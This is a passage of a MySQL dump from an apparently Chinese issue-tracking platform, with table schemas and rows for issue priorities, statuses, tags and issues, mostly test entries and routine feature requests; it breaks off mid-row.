/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `issue_categories` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) NOT NULL DEFAULT '0',
|
||
`name` varchar(30) NOT NULL DEFAULT '',
|
||
`assigned_to_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `issue_categories_project_id` (`project_id`),
|
||
KEY `index_issue_categories_on_assigned_to_id` (`assigned_to_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `issue_categories`
|
||
--
|
||
|
||
LOCK TABLES `issue_categories` WRITE;
|
||
/*!40000 ALTER TABLE `issue_categories` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `issue_categories` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `issue_depends`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `issue_depends`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `issue_depends` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`issue_id` int(11) DEFAULT NULL,
|
||
`depend_issue_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_issue_depends_on_user_id_and_issue_id_and_depend_issue_id` (`user_id`,`issue_id`,`depend_issue_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `issue_depends`
|
||
--
|
||
|
||
LOCK TABLES `issue_depends` WRITE;
|
||
/*!40000 ALTER TABLE `issue_depends` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `issue_depends` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `issue_priorities`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `issue_priorities`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `issue_priorities` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`position` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_issue_priorities_on_name` (`name`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `issue_priorities`
|
||
--
|
||
|
||
LOCK TABLES `issue_priorities` WRITE;
|
||
/*!40000 ALTER TABLE `issue_priorities` DISABLE KEYS */;
|
||
INSERT INTO `issue_priorities` VALUES (1,'低',1,'2020-08-04 08:07:03','2020-08-04 08:07:03'),(2,'正常',2,'2020-08-04 08:07:03','2020-08-04 08:07:03'),(3,'高',3,'2020-08-04 08:07:03','2020-08-04 08:07:03'),(4,'紧急',4,'2020-08-04 08:07:03','2020-08-04 08:07:03'),(5,'立刻',5,'2020-08-04 08:07:03','2020-08-04 08:07:03');
|
||
/*!40000 ALTER TABLE `issue_priorities` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `issue_relations`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `issue_relations`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `issue_relations` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`issue_from_id` int(11) NOT NULL,
|
||
`issue_to_id` int(11) NOT NULL,
|
||
`relation_type` varchar(255) NOT NULL DEFAULT '',
|
||
`delay` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
UNIQUE KEY `index_issue_relations_on_issue_from_id_and_issue_to_id` (`issue_from_id`,`issue_to_id`),
|
||
KEY `index_issue_relations_on_issue_from_id` (`issue_from_id`),
|
||
KEY `index_issue_relations_on_issue_to_id` (`issue_to_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `issue_relations`
|
||
--
|
||
|
||
LOCK TABLES `issue_relations` WRITE;
|
||
/*!40000 ALTER TABLE `issue_relations` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `issue_relations` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `issue_statuses`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `issue_statuses`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `issue_statuses` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(30) NOT NULL DEFAULT '',
|
||
`is_closed` tinyint(1) NOT NULL DEFAULT '0',
|
||
`is_default` tinyint(1) NOT NULL DEFAULT '0',
|
||
`position` int(11) DEFAULT '1',
|
||
`default_done_ratio` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_issue_statuses_on_position` (`position`),
|
||
KEY `index_issue_statuses_on_is_closed` (`is_closed`),
|
||
KEY `index_issue_statuses_on_is_default` (`is_default`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `issue_statuses`
|
||
--
|
||
|
||
LOCK TABLES `issue_statuses` WRITE;
|
||
/*!40000 ALTER TABLE `issue_statuses` DISABLE KEYS */;
|
||
INSERT INTO `issue_statuses` VALUES (1,'新增',0,1,1,NULL),(2,'正在解决',0,0,2,NULL),(3,'已解决',0,0,3,NULL),(4,'反馈',0,0,4,NULL),(5,'关闭',1,0,5,NULL),(6,'拒绝',0,0,6,NULL);
|
||
/*!40000 ALTER TABLE `issue_statuses` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `issue_tags`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `issue_tags`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `issue_tags` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`description` varchar(255) DEFAULT NULL,
|
||
`color` varchar(255) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`issues_count` int(11) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`gid` int(11) DEFAULT NULL,
|
||
`gitea_url` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_issue_tags_on_user_id_and_name_and_project_id` (`user_id`,`name`,`project_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `issue_tags`
|
||
--
|
||
|
||
LOCK TABLES `issue_tags` WRITE;
|
||
/*!40000 ALTER TABLE `issue_tags` DISABLE KEYS */;
|
||
INSERT INTO `issue_tags` VALUES (4,'jjj','b','#F17013',134,430,0,'2021-01-04 02:55:16','2021-01-04 02:55:16',NULL,NULL),(5,'标签01','标签01','#F17013',155,473,0,'2021-01-22 08:24:33','2021-01-22 08:24:33',NULL,NULL),(6,'hhhrhr','hr','#F17013',49,494,2,'2021-02-22 08:31:47','2021-02-22 08:31:47',NULL,NULL),(7,'test','这是一个测试','#bd10e0',1,519,0,'2021-03-11 01:17:10','2021-03-11 01:17:10',NULL,NULL);
|
||
/*!40000 ALTER TABLE `issue_tags` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `issue_tags_relates`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `issue_tags_relates`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `issue_tags_relates` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`issue_id` int(11) DEFAULT NULL,
|
||
`issue_tag_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_issue_tags_relates_on_issue_id_and_issue_tag_id` (`issue_id`,`issue_tag_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=117 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `issue_tags_relates`
|
||
--
|
||
|
||
LOCK TABLES `issue_tags_relates` WRITE;
|
||
/*!40000 ALTER TABLE `issue_tags_relates` DISABLE KEYS */;
|
||
INSERT INTO `issue_tags_relates` VALUES (4,146,NULL,'2020-08-13 05:51:19','2020-08-13 05:51:19'),(5,147,NULL,'2020-08-13 06:52:18','2020-08-13 06:52:18'),(6,148,NULL,'2020-08-13 06:52:29','2020-08-13 06:52:29'),(7,151,NULL,'2020-08-13 06:52:56','2020-08-13 06:52:56'),(8,152,NULL,'2020-08-13 07:14:14','2020-08-13 07:14:14'),(9,153,NULL,'2020-08-13 07:28:08','2020-08-13 07:28:08'),(23,180,NULL,'2020-08-19 01:49:34','2020-08-19 01:49:34'),(24,175,NULL,'2020-08-19 01:56:41','2020-08-19 01:56:41'),(25,143,NULL,'2020-08-19 01:57:20','2020-08-19 01:57:20'),(26,169,NULL,'2020-08-19 01:57:38','2020-08-19 01:57:38'),(27,178,NULL,'2020-08-19 02:27:05','2020-08-19 02:27:05'),(28,174,NULL,'2020-08-19 10:10:56','2020-08-19 10:10:56'),(29,179,NULL,'2020-08-19 10:19:59','2020-08-19 10:19:59'),(30,173,NULL,'2020-08-19 10:33:55','2020-08-19 10:33:55'),(43,172,NULL,'2020-08-20 00:55:58','2020-08-20 00:55:58'),(45,159,NULL,'2020-08-20 02:56:40','2020-08-20 02:56:40'),(46,167,NULL,'2020-08-20 03:04:32','2020-08-20 03:04:32'),(47,163,NULL,'2020-08-20 03:06:08','2020-08-20 03:06:08'),(48,150,NULL,'2020-08-20 03:06:33','2020-08-20 03:06:33'),(50,188,NULL,'2020-08-20 03:32:34','2020-08-20 03:32:34'),(51,162,NULL,'2020-08-20 03:44:06','2020-08-20 03:44:06'),(52,160,NULL,'2020-08-20 03:54:02','2020-08-20 03:54:02'),(53,185,NULL,'2020-08-20 07:05:14','2020-08-20 07:05:14'),(54,158,NULL,'2020-08-20 07:05:37','2020-08-20 07:05:37'),(55,187,NULL,'2020-08-21 00:34:23','2020-08-21 00:34:23'),(57,198,NULL,'2020-08-21 00:46:38','2020-08-21 00:46:38'),(58,201,NULL,'2020-08-21 01:11:00','2020-08-21 01:11:00'),(59,171,NULL,'2020-08-21 01:13:18','2020-08-21 01:13:18'),(60,194,NULL,'2020-08-21 02:33:50','2020-08-21 02:33:50'),(61,197,NULL,'2020-08-21 02:36:18','2020-08-21 02:36:18'),(62,161,NULL,'2020-08-24 01:41:00','2020-08-24 01:41:00'),(63,205,NULL,'2020-08-24 02:11:56','2020-08-24 02:11:56'),(64,207,NULL,'2020-08-24 02:12:14','2020-08-24 02:12:14'),(65,212,NULL,'2020-08-24 03:42:07','2020-08-24 03:42:07'),(67,144,NULL,'2020-08-24 07:00:31','2020-08-24 07:00:31'),(70,216,NULL,'2020-08-24 08:54:32','2020-08-24 08:54:32'),(71,213,NULL,'2020-08-25 00:13:07','2020-08-25 00:13:07'),(72,211,NULL,'2020-08-25 01:52:33','2020-08-25 01:52:33'),(73,168,NULL,'2020-08-25 02:40:33','2020-08-25 02:40:33'),(74,215,NULL,'2020-08-25 03:10:35','2020-08-25 03:10:35'),(78,149,NULL,'2020-08-25 08:49:08','2020-08-25 08:49:08'),(79,218,NULL,'2020-08-25 08:51:44','2020-08-25 08:51:44'),(80,219,NULL,'2020-08-25 09:30:25','2020-08-25 09:30:25'),(82,221,NULL,'2020-08-26 10:21:49','2020-08-26 10:21:49'),(83,222,NULL,'2020-08-27 06:01:29','2020-08-27 06:01:29'),(84,220,NULL,'2020-09-15 00:29:03','2020-09-15 00:29:03'),(86,251,NULL,'2021-01-22 08:21:18','2021-01-22 08:21:18'),(87,264,6,'2021-02-22 08:33:51','2021-02-22 08:33:51'),(88,265,6,'2021-02-22 08:33:56','2021-02-22 08:33:56'),(91,274,NULL,'2021-03-02 09:59:27','2021-03-02 09:59:27'),(92,278,NULL,'2021-03-03 03:01:15','2021-03-03 03:01:15'),(95,290,NULL,'2021-03-03 06:56:05','2021-03-03 06:56:05'),(96,283,NULL,'2021-03-03 07:28:30','2021-03-03 07:28:30'),(97,297,NULL,'2021-03-03 07:28:43','2021-03-03 07:28:43'),(98,295,NULL,'2021-03-03 07:28:58','2021-03-03 07:28:58'),(99,294,NULL,'2021-03-03 07:29:12','2021-03-03 07:29:12'),(100,293,NULL,'2021-03-03 07:29:23','2021-03-03 07:29:23'),(101,292,NULL,'2021-03-03 07:29:36','2021-03-03 07:29:36'),(102,291,NULL,'2021-03-03 07:29:54','2021-03-03 07:29:54'),(103,288,NULL,'2021-03-03 07:30:01','2021-03-03 07:30:01'),(104,289,NULL,'2021-03-03 07:30:17','2021-03-03 07:30:17'),(105,286,NULL,'2021-03-03 07:30:36','2021-03-03 07:30:36'),(106,284,NULL,'2021-03-03 07:30:57','2021-03-03 07:30:57'),(107,273,NULL,'2021-03-03 07:31:22','2021-03-03 07:31:22'),(108,285,NULL,'2021-03-03 07:32:38','2021-03-03 07:32:38'),(110,299,NULL,'2021-03-04 07:17:01','2021-03-04 07:17:01'),(111,298,NULL,'2021-03-04 07:17:16','2021-03-04 07:17:16'),(112,300,NULL,'2021-03-04 07:17:27','2021-03-04 07:17:27'),(113,305,NULL,'2021-03-09 01:15:11','2021-03-09 01:15:11'),(114,304,NULL,'2021-03-09 06:17:03','2021-03-09 06:17:03'),(115,306,NULL,'2021-03-10 07:32:54','2021-03-10 07:32:54'),(116,303,NULL,'2021-03-11 01:47:48','2021-03-11 01:47:48');
|
||
/*!40000 ALTER TABLE `issue_tags_relates` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `issue_times`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `issue_times`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `issue_times` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`issue_id` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`start_time` datetime DEFAULT NULL,
|
||
`end_time` datetime DEFAULT NULL,
|
||
`cost_time` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_issue_times_on_issue_id_and_user_id` (`issue_id`,`user_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `issue_times`
|
||
--
|
||
|
||
LOCK TABLES `issue_times` WRITE;
|
||
/*!40000 ALTER TABLE `issue_times` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `issue_times` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `issues`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `issues`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `issues` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`tracker_id` int(11) NOT NULL,
|
||
`project_id` int(11) NOT NULL,
|
||
`subject` varchar(255) NOT NULL DEFAULT '',
|
||
`description` longtext,
|
||
`due_date` date DEFAULT NULL,
|
||
`category_id` int(11) DEFAULT NULL,
|
||
`status_id` int(11) NOT NULL,
|
||
`assigned_to_id` int(11) DEFAULT NULL,
|
||
`priority_id` int(11) NOT NULL,
|
||
`fixed_version_id` int(11) DEFAULT NULL,
|
||
`author_id` int(11) NOT NULL,
|
||
`created_on` datetime DEFAULT NULL,
|
||
`updated_on` datetime DEFAULT NULL,
|
||
`start_date` date DEFAULT NULL,
|
||
`done_ratio` int(11) NOT NULL DEFAULT '0',
|
||
`estimated_hours` float DEFAULT NULL,
|
||
`parent_id` int(11) DEFAULT NULL,
|
||
`root_id` int(11) DEFAULT NULL,
|
||
`lft` int(11) DEFAULT NULL,
|
||
`rgt` int(11) DEFAULT NULL,
|
||
`is_private` tinyint(1) NOT NULL DEFAULT '0',
|
||
`closed_on` datetime DEFAULT NULL,
|
||
`project_issues_index` int(11) DEFAULT NULL,
|
||
`issue_type` varchar(255) DEFAULT NULL,
|
||
`token` int(11) DEFAULT '0',
|
||
`issue_tags_value` varchar(255) DEFAULT NULL,
|
||
`is_lock` tinyint(1) DEFAULT '0',
|
||
`issue_classify` varchar(255) DEFAULT NULL,
|
||
`ref_name` varchar(255) DEFAULT NULL,
|
||
`branch_name` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `issues_project_id` (`project_id`),
|
||
KEY `index_issues_on_status_id` (`status_id`),
|
||
KEY `index_issues_on_category_id` (`category_id`),
|
||
KEY `index_issues_on_assigned_to_id` (`assigned_to_id`),
|
||
KEY `index_issues_on_fixed_version_id` (`fixed_version_id`),
|
||
KEY `index_issues_on_tracker_id` (`tracker_id`),
|
||
KEY `index_issues_on_priority_id` (`priority_id`),
|
||
KEY `index_issues_on_author_id` (`author_id`),
|
||
KEY `index_issues_on_created_on` (`created_on`),
|
||
KEY `index_issues_on_root_id_and_lft_and_rgt` (`root_id`,`lft`,`rgt`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=309 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `issues`
|
||
--
|
||
|
||
LOCK TABLES `issues` WRITE;
|
||
/*!40000 ALTER TABLE `issues` DISABLE KEYS */;
|
||
INSERT INTO `issues` VALUES (1,1,3,'godo','test',NULL,NULL,1,1,2,NULL,1,'2018-07-18 16:50:44','2018-07-18 16:50:44','2018-07-18',0,NULL,NULL,1,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(2,1,3,'第一个问题','我是描述',NULL,NULL,1,NULL,2,NULL,1,'2018-07-19 09:48:42','2018-07-19 09:48:42','2018-07-19',0,NULL,NULL,2,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(3,1,3,'测试issues','dddd',NULL,NULL,1,NULL,2,NULL,1,'2018-07-19 09:52:32','2018-07-19 09:52:32','2018-07-19',0,NULL,NULL,3,1,2,0,NULL,3,NULL,NULL,NULL,0,NULL,NULL,NULL),(4,1,8,'the explanation of inserting sort can be improved ','the explanation of inserting sort can be improved',NULL,NULL,1,NULL,2,NULL,1,'2018-07-20 10:01:50','2018-07-20 10:02:24','2018-07-20',0,NULL,NULL,4,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(5,1,8,'RedBlackBST Implementation by Java ','RedBlackBST Implementation by Java ',NULL,NULL,1,NULL,2,NULL,1,'2018-07-20 10:04:20','2018-08-03 17:44:41','2018-07-20',0,NULL,NULL,5,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(6,1,13,'generated epub contains one chapter twice ','generated epub contains one chapter twice ',NULL,NULL,1,NULL,2,NULL,5,'2018-07-20 10:17:47','2018-08-02 22:55:02','2018-07-20',0,NULL,NULL,6,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(7,1,13,'Example Configuration via a YAML File or a JSON File in Logging ','Example Configuration via a YAML File or a JSON File in Logging ',NULL,NULL,1,NULL,2,NULL,5,'2018-07-20 10:18:02','2018-07-20 10:18:02','2018-07-20',0,NULL,NULL,7,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(8,1,13,'Related guide that may have useful content to reuse ','Related guide that may have useful content to reuse ',NULL,NULL,1,NULL,2,NULL,5,'2018-07-20 10:18:18','2018-08-08 09:28:41','2018-07-20',0,NULL,NULL,8,1,2,0,NULL,3,NULL,NULL,NULL,0,NULL,NULL,NULL),(9,1,11,'the explanation of inserting sort can be improved ','the explanation of inserting sort can be improved ',NULL,NULL,1,NULL,2,NULL,5,'2018-07-20 10:19:30','2018-07-20 10:19:30','2018-07-20',0,NULL,NULL,9,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(10,1,11,'Java\\data_structures\\Trees : Implementation of binary search tree methods in binary tree ','Java\\data_structures\\Trees : Implementation of binary search tree methods in binary tree ',NULL,NULL,1,NULL,2,NULL,5,'2018-07-20 10:19:50','2018-07-20 10:19:50','2018-07-20',0,NULL,NULL,10,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(11,1,11,'No implementations of CircleLinkedLists ','No implementations of CircleLinkedLists ',NULL,NULL,1,NULL,2,NULL,5,'2018-07-20 10:21:01','2018-07-20 10:21:01','2018-07-20',0,NULL,NULL,11,1,2,0,NULL,3,NULL,NULL,NULL,0,NULL,NULL,NULL),(12,1,12,' Recommending DEAP from personal experience and astroML for completeness ','\nRecommending DEAP from personal experience and astroML for completeness ',NULL,NULL,1,NULL,2,NULL,5,'2018-07-20 10:21:31','2018-07-20 10:21:31','2018-07-20',0,NULL,NULL,12,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(13,1,12,'Add pyglet lib under \'game development\'. ','Add pyglet lib under \'game development\'. ',NULL,NULL,1,NULL,2,NULL,5,'2018-07-20 10:22:04','2018-08-08 09:22:35','2018-07-20',0,NULL,NULL,13,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(14,1,12,'Add \"How to Think~\" (interactive tutorial)','Add \"How to Think~\" (interactive tutorial)',NULL,NULL,1,NULL,2,NULL,5,'2018-07-20 10:22:24','2018-08-08 09:22:07','2018-07-20',0,NULL,NULL,14,1,2,0,NULL,3,NULL,NULL,NULL,0,NULL,NULL,NULL),(15,1,12,'Suggestion, Inflection package ','Suggestion, Inflection package Suggestion, Inflection package ',NULL,NULL,1,NULL,2,NULL,5,'2018-07-20 10:22:40','2018-08-08 09:21:34','2018-07-20',0,NULL,NULL,15,1,2,0,NULL,4,NULL,NULL,NULL,0,NULL,NULL,NULL),(17,2,18,'SQA轻量级在线问答系统前后端分离','前端应用React框架',NULL,NULL,1,6,2,NULL,6,'2018-07-20 14:51:24','2018-08-03 17:11:00','2018-07-20',0,NULL,NULL,17,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(18,1,12,'issue','',NULL,NULL,1,NULL,2,NULL,5,'2018-07-23 14:35:05','2018-07-23 14:35:05','2018-07-23',0,NULL,NULL,18,1,2,0,NULL,5,NULL,NULL,NULL,0,NULL,NULL,NULL),(21,1,18,'test','\n\n\n\n\n\n\n\n',NULL,NULL,1,NULL,2,NULL,1,'2018-08-03 17:50:18','2018-08-03 18:49:52','2018-08-03',0,NULL,NULL,21,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(22,4,19,'修改Swift编写500问题','','2018-08-06',NULL,1,6,2,NULL,6,'2018-08-03 18:35:14','2018-08-03 18:35:14','2018-08-03',0,3,NULL,22,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(24,1,21,'Rails整个框架打架','',NULL,NULL,1,1,2,NULL,1,'2018-08-03 18:52:08','2018-08-03 18:52:08','2018-08-03',0,NULL,NULL,24,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(25,1,13,'OK epub contains one chapter twice ','generated epub contains one chapter twice ',NULL,NULL,1,NULL,2,NULL,5,'2018-08-08 09:29:58','2018-08-10 09:19:23','2018-07-20',0,NULL,NULL,25,1,2,0,NULL,4,NULL,NULL,NULL,0,NULL,NULL,NULL),(26,1,32,'样式问题','样式问题',NULL,NULL,1,NULL,2,NULL,1,'2018-11-14 14:54:47','2018-11-14 14:54:47','2018-11-14',0,NULL,NULL,26,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(27,1,76,'add proper software test','',NULL,NULL,1,1,2,NULL,1,'2018-11-22 23:27:43','2018-11-22 23:27:43','2018-11-22',0,NULL,NULL,27,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(28,1,76,'add GPU support to Cmake build system ','',NULL,NULL,1,1,3,NULL,1,'2018-11-23 00:37:09','2018-11-23 00:37:09','2018-11-23',0,NULL,NULL,28,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(29,1,76,'add OSX to continuous integration','',NULL,NULL,1,NULL,2,NULL,1,'2018-11-23 00:37:57','2018-11-23 00:37:57','2018-11-23',0,NULL,NULL,29,1,2,0,NULL,3,NULL,NULL,NULL,0,NULL,NULL,NULL),(30,1,81,'first issue','first issue',NULL,NULL,1,NULL,2,NULL,19,'2019-01-15 15:08:31','2019-01-15 15:08:31','2019-01-15',0,NULL,NULL,30,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(31,1,94,'第一个issue','第一个issue',NULL,NULL,1,NULL,4,NULL,19,'2019-01-21 10:17:24','2019-01-21 10:18:56','2019-01-21',0,NULL,NULL,31,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(32,1,95,'用户注册、登录模块开发','相关接口开开发及验证','2019-01-25',NULL,5,1,2,NULL,1,'2019-01-21 15:39:03','2019-01-21 15:40:30','2019-01-21',100,NULL,NULL,32,1,2,0,'2019-01-21 15:40:30',1,NULL,NULL,NULL,0,NULL,NULL,NULL),(33,1,95,'前端静态资源压缩','','2019-01-21',NULL,1,1,2,NULL,1,'2019-01-21 15:43:00','2019-01-21 15:43:00','2019-01-21',0,2,NULL,33,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(34,1,95,'问答系统性能优化,并发量2000+的时候,系统响应时间不超过1.5秒','目前问答展示递归策略有很大优化的空间','2019-01-31',NULL,1,1,2,NULL,1,'2019-01-21 15:44:48','2019-01-21 15:44:48','2019-01-21',0,7,NULL,34,1,2,0,NULL,3,NULL,NULL,NULL,0,NULL,NULL,NULL),(35,4,100,'可行性分析','。。。。','2019-01-24',NULL,1,1,5,2,1,'2019-01-22 00:35:19','2019-01-22 00:37:36','2019-01-22',0,12,NULL,35,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(36,1,100,'完成项目初始化代码','','2019-01-27',NULL,1,1,2,NULL,1,'2019-01-22 00:37:13','2019-01-22 00:37:13','2019-01-22',0,NULL,NULL,36,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(37,4,100,'项目代码的初始化','','2019-01-24',NULL,1,1,2,2,1,'2019-01-22 00:39:45','2019-01-22 00:39:45','2019-01-22',0,16,NULL,37,1,2,0,NULL,3,NULL,NULL,NULL,0,NULL,NULL,NULL),(38,1,100,'任务分配','添加描述','2019-01-23',NULL,3,6,2,2,1,'2019-01-22 00:40:32','2019-01-22 00:57:05','2019-01-22',100,NULL,NULL,38,1,2,0,NULL,4,NULL,NULL,NULL,0,NULL,NULL,NULL),(39,1,100,'de','',NULL,NULL,1,1,2,NULL,1,'2019-01-22 00:49:47','2019-01-22 00:49:47','2019-01-22',0,NULL,NULL,39,1,2,0,NULL,5,NULL,NULL,NULL,0,NULL,NULL,NULL),(40,1,95,'评论去回复效果','类似微信的回复效果',NULL,NULL,1,1,2,NULL,1,'2019-01-22 00:50:45','2019-01-22 00:50:45','2019-01-22',0,NULL,NULL,40,1,2,0,NULL,4,NULL,NULL,NULL,0,NULL,NULL,NULL),(41,4,101,'初始化代码','描述','2019-01-24',NULL,1,6,2,3,1,'2019-01-22 09:14:03','2019-01-22 09:21:35','2019-01-22',100,NULL,NULL,41,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(42,1,101,'代码审查','','2019-01-24',NULL,1,6,2,NULL,1,'2019-01-22 09:19:46','2019-01-22 09:19:46','2019-01-22',0,NULL,NULL,42,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(43,1,120,'编译问题','In file included from /home/zhangshuai/Parallel_Distributed_Gazebo/gazebo/gazebo/common/SystemPaths.hh:36:0,\n from /home/zhangshuai/Parallel_Distributed_Gazebo/gazebo/gazebo/common/BVHLoader.cc:27:\n/home/zhangshuai/Parallel_Distributed_Gazebo/gazebo/gazebo/common/Event.hh:32:79: fatal error: boost/threadpool.hpp: 没有那个文件或目录\ncompilation terminated.\n',NULL,NULL,1,NULL,2,NULL,26,'2019-03-05 15:49:52','2019-03-05 